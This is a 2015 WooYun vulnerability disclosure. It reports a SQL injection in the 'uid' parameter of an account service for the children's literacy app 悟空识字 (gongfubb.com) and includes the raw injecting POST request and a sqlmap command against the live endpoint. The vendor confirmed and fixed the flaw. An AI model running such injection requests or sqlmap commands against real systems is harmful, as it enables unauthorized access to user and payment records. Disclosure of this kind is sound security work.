当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092850

漏洞标题:悟空识字某处SQL注入可影响3000万用户账号

相关厂商:gongfubb.com

漏洞作者: 俏牛

提交时间:2015-01-23 11:28

修复时间:2015-04-23 11:30

公开时间:2015-04-23 11:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向第三方安全合作伙伴开放
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

宁波启点教育科技有限公司旗下产品悟空识字某处SQL注入,可导致3000万用户信息及大量订单等信息泄露。

详细说明:

公司名称:宁波启点教育科技有限公司
公司简介:
  宁波启点教育科技有限公司是创业型互联网教育软件研发运营公司,公司专注于儿童互联网教育市场,致力于为3-8岁的孩子提供最好的幼儿教育软件。公司创始人是一群热爱孩子的爸爸们,来自国内知名的网络、互联网公司,有着丰富的成功互联网项目开发运营经验
链接:http://qidian.gongfubb.com/
悟空识字存在POST型Sql注入,uid参数带入单引号报错

firefoxSqlTest.JPG


Post请求:
POST http://account2.gongfubb.com/home/user_service_utf8.php?do=get_userinfo HTTP/1.1
Host: account2.gongfubb.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
t=58610f9a69e42241f6757db55b016d84&uid=24421778'

漏洞证明:

Sqlmap:
python sqlmap/sqlmap.py -u "http://account2.gongfubb.com/home/user_service_utf8.php?do=get_userinfo" --data="t=58610f9a69e42241f6757db55b016d84&uid=24421778" -p "uid" -v 6 --current-user
当前用户:

CurUser.jpg


数据库,有两个比较重要的库一个主要信息为用户信息,一个主要信息为订单信息:

dbs.jpg


订单表结构:

DbPayTbT_orderColumns.jpg


订单记录,超百万条:

dbPayTbT_order_count.jpg


用户信息表,超3000万的用户信息:

dbUcenterTbUc_membersCount.jpg


抽取几十条支付信息:

支付信息1.jpg


如果觉得有用,请送个悟空识字的收费账号给小孩玩玩。

修复方案:

不在行。

版权声明:转载请注明来源 俏牛@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-26 10:05

厂商回复:

已处理,多谢。

最新状态:

暂无